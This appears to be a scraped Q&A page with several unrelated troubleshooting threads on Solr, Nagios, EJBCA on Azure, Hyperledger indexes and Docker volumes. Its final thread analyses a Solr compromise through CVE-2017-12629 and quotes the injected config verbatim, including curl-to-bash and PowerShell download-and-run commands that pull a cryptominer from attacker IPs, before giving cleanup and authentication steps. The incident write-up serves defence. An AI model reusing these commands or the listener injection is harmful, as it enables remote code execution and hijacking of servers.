How to perform an In-Place-Update in Solr? - search

I currently try to perform an In-Place Update in Solr 8.11.1 (https://solr.apache.org/guide/8_11/updating-parts-of-documents.html#in-place-updates). But the update does not seem to be successful even though my field to be updated fulfills all the listed criteria as well as the version field and there are no copy fields.
I recreated it with a minimal schema with a local Solr docker container and still can't make it work.
started a new solr container: docker run -d -p 8983:8983 --name my_solr -t solr:8.11.1-slim (using this version because this version is used in our project)
created core: docker exec -it my_solr solr create_core -c gettingstarted
created a non-indexed, non-stored, single-valued, numeric docValued field popularity
this leads to a minimal schema with the following fields: http://localhost:8983/solr/gettingstarted/schema/fields
{
"responseHeader":{
"status":0,
"QTime":0},
"fields":[{
"name":"_nest_path_",
"type":"_nest_path_"},
{
"name":"_root_",
"type":"string",
"docValues":false,
"indexed":true,
"stored":false},
{
"name":"_text_",
"type":"text_general",
"multiValued":true,
"indexed":true,
"stored":false},
{
"name":"_version_",
"type":"plong",
"indexed":false,
"stored":false},
{
"name":"id",
"type":"string",
"multiValued":false,
"indexed":true,
"required":true,
"stored":true},
{
"name":"popularity",
"type":"pint",
"uninvertible":false,
"docValues":true,
"indexed":false,
"stored":false}]}
I created a document with ID "1"
I perform the in-place update and enforce the in-place update as suggested in the documentation:
http://localhost:8983/solr/gettingstarted/update?commit=true&update.partial.requireInPlace=true' --data-binary '[{"id":"1", "popularity":{"set":99}}]
with a successful response so I would expect that the in-place update was successful:
{"responseHeader":{"status":0,"QTime":1}}
However, the update was not performed as I can't retrieve the popularity-value via the field list (https://solr.apache.org/guide/6_6/docvalues.html#DocValues-RetrievingDocValuesDuringSearch)
{
"responseHeader":{
"status":0,
"QTime":2,
"params":{
"q":"*:*",
"indent":"true",
"fl":"id,popularity",
"q.op":"OR",
"_":"1662731041895"}},
"response":{"numFound":1,"start":0,"numFoundExact":true,"docs":[
{
"id":"1"}]
}}
Can anyone explain this behavior as I would expect this in-place-update to work as it is.
Best regards,
Jonas

Related

Nagios Core Influxdb not showing nagios data

I have followed this guide:
https://support.nagios.com/kb/article/nagios-core-performance-graphs-using-influxdb-nagflux-grafana-histou-802.html#Nagflux_Config
Already have pnp4nagios running on the server (Debian 9). But I can't get any further, busy for weeks to try to get this fixed.
I am stuck at this point:
Verify Nagflux Is Working
Execute the following query to verify that InfluxDB is being populated with Nagios performance data:
curl -G "http://localhost:8086/query?db=nagflux&pretty=true" --data-urlencode "q=show series"
When I execute that command I get this:
{
"results": [
{}
]
}
Already done this on another distro (CentOS 8), still not results.
But when I execute this command (earlier in the documentation)
curl -G "http://localhost:8086/query?pretty=true" --data-urlencode "q=show databases"
This works:
{
"results": [
{
"series": [
{
"name": "databases",
"columns": [
"name"
],
"values": [
[
"_internal"
],
[
"nagflux"
]
]
}
]
}
]
}
I can add the InfluxDB datasource succesfully in Grafana but I can not select any data when I try so select it from the field "FROM".
It's only showing:
Default
Autogen
So I am very curious what am I doing wrong, normally the documentation from Nagios support works very good.
Thank you big time for reading my issue :).
As you already have PNP4Nagios installed, https://support.nagios.com/kb/article/nagios-core-using-grafana-with-pnp4nagios-803.html would be more apropriate solution for you.
/usr/local/nagios/etc/nagios.cfg has different host_perfdata_file_processing_command when you try to fill influxdb (with nagflux) instead of using Grafana with PNP4Nagios.
You don't need another server. I have Nagios Core, InfluxDB, Nagflux, Histou and Grafana working on same machine.
And you don't have to uninstal PNP4Nagios, just stop & disable service on boot: systemctl stop npcd.service && systemctl disable npcd.service.
After that you have to edit nagios.cfg according to: https://support.nagios.com/kb/article/nagios-core-performance-graphs-using-influxdb-nagflux-grafana-histou-802.html#Nagios_Command_Config to change host_perfdata_file_processing_command value, and change format of *_perfdata_file_template.
Then define process-host-perfdata-file-nagflux & process-service-perfdata-file-nagflux commands in commands.cfg.
If you did like described above, after minute you should see changes in your nagflux database.
Install influxdb-client, then:
influx
use nagflux
SELECT * FROM METRICS
You should see your database loading :)

containerd error "failed to find user by uid" when creating ejbca docker container on azure

When I try to create an Azure container instance for EJBCA-ce I get an error and cannot see any logs.
I expect the following result :
But I get the following error :
Failed to start container my-azure-container-resource-name, Error response: to create containerd task: failed to create container e9e48a_________ffba97: guest RPC failure: failed to find user by uid: 10001: expected exactly 1 user matched '0': unknown
Some context:
I run the container on azure cloud container instance
I tried
from ARM template
from Azure Portal.
with file share mounted
with database env variable
without any env variables
It runs fine locally using the same env variable (database configuration).
It used to run with the same configuration a couple weeks ago.
Here are some logs I get when I attach the container group from az cli.
(count: 1) (last timestamp: 2020-11-03 16:04:32+00:00) pulling image "primekey/ejbca-ce:6.15.2.3"
(count: 1) (last timestamp: 2020-11-03 16:04:37+00:00) Successfully pulled image "primekey/ejbca-ce:6.15.2.3"
(count: 28) (last timestamp: 2020-11-03 16:27:52+00:00) Error: Failed to start container aci-pulsy-ccm-ejbca-snd, Error response: to create containerd task: failed to create container e9e48a06807fba124dc29633dab10f6229fdc5583a95eb2b79467fe7cdffba97: guest RPC failure: failed to find user by uid: 10001: expected exactly 1 user matched '0': unknown
An extract of the dockerfile from dockerhub
I suspect the issue might be related to the commands USER 0 and USER 10001 we found several times in the dockerfile.
COPY dir:89ead00b20d79e0110fefa4ac30a827722309baa7d7d74bf99910b35c665d200 in /
/bin/sh -c rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
CMD ["/bin/bash"]
USER 0
COPY dir:893e424bc63d1872ee580dfed4125a0bef1fa452b8ae89aa267d83063ce36025 in /opt/primekey
COPY dir:756f0fe274b13cf418a2e3222e3f6c2e676b174f747ac059a95711db0097f283 in /licenses
USER 10001
CMD ["/opt/primekey/wildfly-14.0.1.Final/bin/standalone.sh" "-b" "0.0.0.0"
MAINTAINER PrimeKey Solutions AB
ARG releaseTag
ARG releaseEdition
ARM template
{
"type": "Microsoft.ContainerInstance/containerGroups",
"apiVersion": "2019-12-01",
"name": "[variables('ejbcaContainerGroupName')]",
"location": "[parameters('location')]",
"tags": "[variables('tags')]",
"dependsOn": [
"[resourceId('Microsoft.DBforMariaDB/servers', variables('ejbcaMariadbServerName'))]",
"[resourceId('Microsoft.DBforMariaDB/servers/databases', variables('ejbcaMariadbServerName'), variables('ejbcaMariadbDatabaseName'))]"
],
"properties": {
"sku": "Standard",
"containers": [
{
"name": "[variables('ejbcaContainerName')]",
"properties": {
"image": "primekey/ejbca-ce:6.15.2.3",
"ports": [
{
"protocol": "TCP",
"port": 443
},
{
"protocol": "TCP",
"port": 8443
}
],
"environmentVariables": [
{
"name": "DATABASE_USER",
"value": "[concat(parameters('mariadbUser'),'#', variables('ejbcaMariadbServerName'))]"
},
{
"name": "DATABASE_JDBC_URL",
"value": "[variables('ejbcaEnvVariableJdbcUrl')]"
},
{
"name": "DATABASE_PASSWORD",
"secureValue": "[parameters('mariadbAdminPassword')]"
}
],
"resources": {
"requests": {
"memoryInGB": 1.5,
"cpu": 2
}
}
,
"volumeMounts": [
{
"name": "certificates",
"mountPath": "/mnt/external/secrets"
}
]
}
}
],
"initContainers": [],
"restartPolicy": "OnFailure",
"ipAddress": {
"ports": [
{
"protocol": "TCP",
"port": 443
},
{
"protocol": "TCP",
"port": 8443
}
],
"type": "Public",
"dnsNameLabel": "[parameters('ejbcaContainerGroupDNSLabel')]"
},
"osType": "Linux",
"volumes": [
{
"name": "certificates",
"azureFile": {
"shareName": "[parameters('ejbcaCertsFileShareName')]",
"storageAccountName": "[parameters('ejbcaStorageAccountName')]",
"storageAccountKey": "[parameters('ejbcaStorageAccountKey')]"
}
}
]
}
}
It runs fine on my local machine on linux (ubuntu 20.04)
docker run -it --rm -p 8080:8080 -p 8443:8443 -h localhost -e DATABASE_USER="mymaridbuser#my-db" -e DATABASE_JDBC_URL="jdbc:mariadb://my-azure-domain.mariadb.database.azure.com:3306/ejbca?useSSL=true" -e DATABASE_PASSWORD="my-pwd" primekey/ejbca-ce:6.15.2.3
In the EJBCA-ce container image, I think they are trying to provide an user different than root to run the EJBCA server. According to the Docker documentation:
The USER instruction sets the user name (or UID) and optionally the user group (or GID) to use when running the image and for any RUN, CMD and ENTRYPOINT instructions that follow it in the Dockerfile
In the Dockerfile they reference two users, root, corresponding to UID 0, and another one, with UID 10001.
Typically, in Linux and UNIX systems, UIDs can be organized in different ranges: it is largely dependent on the concrete operating system and user management praxis, but it is very likely that the first user account created in a linux system will be assigned to UID 1001 or 10001, like in this case. Please, see for instance the UID entry in wikipedia or this article.
AFAIK, the USER indicated does not need to exist in your container to run it correctly: in fact, if you run it locally, it will start without further problem.
The user with UID 10001 will be actually setup in your container by the script that is run in the CMD defined in the Dockerfile, /opt/primekey/bin/start.sh, by this code fragment:
if ! whoami &> /dev/null; then
if [ -w /etc/passwd ]; then
echo "${APPLICATION_NAME}:x:$(id -u):0:${APPLICATION_NAME} user:/opt:/sbin/nologin" >> /etc/passwd
fi
fi
Please, be aware that APPLICATION_NAME in this context takes the value ejbca and that the user which runs this script, as indicated in the Dockerfile, is 10001. That will be the value provided by the command id -u in this code.
You can verify it if you run your container locally:
docker run -it -p 8080:8080 -p 8443:8443 -h localhost primekey/ejbca-ce:6.15.2.3
And initiate bash into it:
docker exec -it container_name /bin/bash
If you run whoami, it will tell you ejbca.
If you run id it will give you the following output:
uid=10001(ejbca) gid=0(root) groups=0(root)
You can verify the user existence in the /etc/passwd as well:
bash-4.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
ejbca:x:10001:0:ejbca user:/opt:/sbin/nologin
The reason why Pierre did not get this output is because he ran the container overwriting the provided CMD and, as a consequence, not executing the start.sh script responsible of the user creation, as above mentioned.
For any reason, and this is where my knowledge fails me, when Azure is trying to run your container, it is failing because the USER 10001 identified in the Dockerfile does not exist.
I think it could be related with the use of containerd instead of docker.
The error reported by Azure seems related with the Microsoft project opengcs.
They say about the project:
Open Guest Compute Service is a Linux open source project to further the development of a production quality implementation of Linux Hyper-V container on Windows (LCOW). It's designed to run inside a custom Linux OS for supporting Linux container payload.
And:
The focus of LCOW v2 as a replacement of LCOW v1 is through the coordination and work that has gone into containerd/containerd and its Runtime V2 interface. To see our containerd hostside shim please look here Microsoft/hcsshim/cmd/containerd-shim-runhcs-v1.
The error you see in the console is raised by the spec.go file that you can find in their code base, when they are trying to establish the user on behalf of whom the container process should be run:
func setUserID(spec *oci.Spec, uid int) error {
u, err := getUser(spec, func(u user.User) bool {
return u.Uid == uid
})
if err != nil {
return errors.Wrapf(err, "failed to find user by uid: %d", uid)
}
spec.Process.User.UID, spec.Process.User.GID = uint32(u.Uid), uint32(u.Gid)
return nil
}
This code is executed by this other code fragment - you can see the full function code here:
parts := strings.Split(userstr, ":")
switch len(parts) {
case 1:
v, err := strconv.Atoi(parts[0])
if err != nil {
// evaluate username to uid/gid
return setUsername(spec, userstr)
}
return setUserID(spec, int(v))
And the getUser function:
func getUser(spec *oci.Spec, filter func(user.User) bool) (user.User, error) {
users, err := user.ParsePasswdFileFilter(filepath.Join(spec.Root.Path, "/etc/passwd"), filter)
if err != nil {
return user.User{}, err
}
if len(users) != 1 {
return user.User{}, errors.Errorf("expected exactly 1 user matched '%d'", len(users))
}
return users[0], nil
}
As you can see, these are exactly the errors that Azure is reporting you.
As a summary, I think they are providing a Windows LCOW solution that conforms to the OCI Image Format Specification suitable to run containers with containerd.
As you indicated if It used to run with the same configuration a couple weeks ago my best guest is that, perhaps, they switched your containers from a pure Linux containerd runtime implementation to one based in Windows and in the above mentioned software, and this is why you containers are now failing.
A possible workaround could be to create a custom image based on the official provided by PrimeKey and create the user 10001, as also Pierre pointed out.
To accomplish this task, first, create a new custom Dockerfile. You can try, for instance:
FROM primekey/ejbca-ce:6.15.2.3
USER 0
RUN echo "ejbca:x:10001:0:ejbca user:/opt:/sbin/nologin" >> /etc/passwd
USER 10001
Please, note that you may need to define some of the environment variables from the official EJBCA image.
With this Dockerfile you can build your image with docker or docker compose with an appropriate docker-compose.yaml file, something like:
version: "3"
services:
ejbca:
image: <your repository>/ejbca
build: .
ports:
- "8080:8080"
- "8443:8443"
Please, customize it as you consider appropriate.
With this setup the new container will still run properly in a local environment in the same way as the original one: I hope it will be also the case in Azure.
User with UID 10001 does not exists in your image. This does not prevent USER command in your Dockerfile to work or the image to be invalid itself, but it seems to cause issues with Azure container.
I cannot find doc or any reference on why it doesn't work on Azure (will update if so), but adding the user in the image should solve the issue. Try adding something like this in your Dockerfile to create user with UID 10001 (this must be done as root, i.e. with user 0) :
useradd -u 10001 myuser
Additional notes to see user 10001 does not exists:
# When running container, not recognized by system
$ docker run docker.io/primekey/ejbca-ce:6.15.2.3 whoami
whoami: cannot find name for user ID 10001
# Not present in /etc/passwd
$ docker run docker.io/primekey/ejbca-ce:6.15.2.3 cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

Is there a way to set different indexes for different contracts in couchDB with hyperledger fabric

I'm using hyperledger fabric 1.4 with CouchDB 2.3.1 and 2 contracts but I'm having trouble setting the indexes in the contracts and don't get how to upload the indexes to couchDB.
These are my indexes:
META-INF/statedb/couchdb/indexes/carIndex.json
{
"index": {
"fields": [
"idCar",
"date"
]
},
"ddoc": "indexIdCarDoc",
"name": "indexIdCar",
"type": "json"
}
META-INF/statedb/couchdb/indexes/bikeIndex.json
{
"index": {
"fields": [
"idBike",
"date"
]
},
"ddoc": "indexIdBikeDoc",
"name": "indexIdBike",
"type": "json"
}
how can I tell hyperledger to set first index for mychannel_carchaincode table and the second index for the mychannel_bikechaincode table?
Also, my chaincode its written in typescript, should my META-INF/statedb/couchdb/indexes folder be in the dist folder? its that why I can't see the indexes in my couchdb after I upgrade? or indexes can only be uplodaded on instantiate?
Thanks
I was with the same problem. My version is 1.4.7 for hyperledger and I'm using IBM Blockchain Extesion for VS Code.
I solve when I put this folder inside lib folder in my project.
lib/META-INF/statedb/couchdb/indexes/index.json
After Upgrade the smart contract,
to make sure that works, go to the terminal and use this docker command:
docker logs 39f4adec6057 2>&1 | grep "CouchDB index"
where 39f4adec6057 is the peer container
if work this show something like:
[couchdb] CreateIndex -> INFO 0fc Created CouchDB index [tipoAtivo] in state database [mychannel_integra-chaincode] using design document [_design/tipoAtivoDoc]
If you are using Typescript, this will be compiled: make sure that this folder will be copy to dist folder. For this you can add to your package JSON a postbuild
"postbuild": "cp -av ./META-INF dist/lib/META-INF",
When you give chaincode command, you have to use "use_index" parameter and have to tell the chaincode about what index it will use for this command.
Link and example:
https://hyperledger-fabric.readthedocs.io/en/release-2.2/couchdb_tutorial.html#use-best-practices-for-queries-and-indexes

Create two containers with the same second volume names

I am learning Docker. Wen i run two MYSQL containers with -v options whose two volumes names are the same , only one of those two volumes is created on the host file system. Would the second one override the first one or the system keeps the first one ? I don't see any command showing the volume names conflict. Here are my commands
docker container run -d --name mysql_1 -e MYSQL_ALLOW_EMPTY_PASSWORD=True -v mysql_db:/var/lib/mysql mysql
docker container run -d --name mysql_2 -e MYSQL_ALLOW_EMPTY_PASSWORD=True -v mysql_db:/var/lib/mysql mysql
I check the logs with command docker volume [name] inspect and it seems the second volume will override the first one
[
{
"CreatedAt": "2020-07-24T09:34:05Z",
"Driver": "local",
"Labels": null,
"Mountpoint": "/var/lib/docker/volumes/mysql_db78/_data",
"Name": "mysql_db78",
"Options": null,
"Scope": "local"
}
]
The createdAt is the time that i typed the last docker container run -v .. command. But it is strange that docker didn't notify about volume name conflict
You're allowed to mount the same volume into different containers. Files read and written by one can be read and written by the other. There's no "conflict" here.
In both docker run commands you're telling Docker to mount a volume named mysql_db on to the path /var/lib/mysql. In the first command, Docker automatically creates the named volume, as though you had run docker volume create mysql_db, since it doesn't exist yet. Then the second docker run command reuses that some volume.
(Operationally, you can't have multiple MySQL servers running off the same data store, so you should see a startup-time error referring to a lock file in the mysql_2 container. At a design level, try to avoid file sharing and prefer cross-container API calls instead, since coordinating file sharing can be tricky and it doesn't scale well to more advanced environments like Kubernetes.)

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes

Resources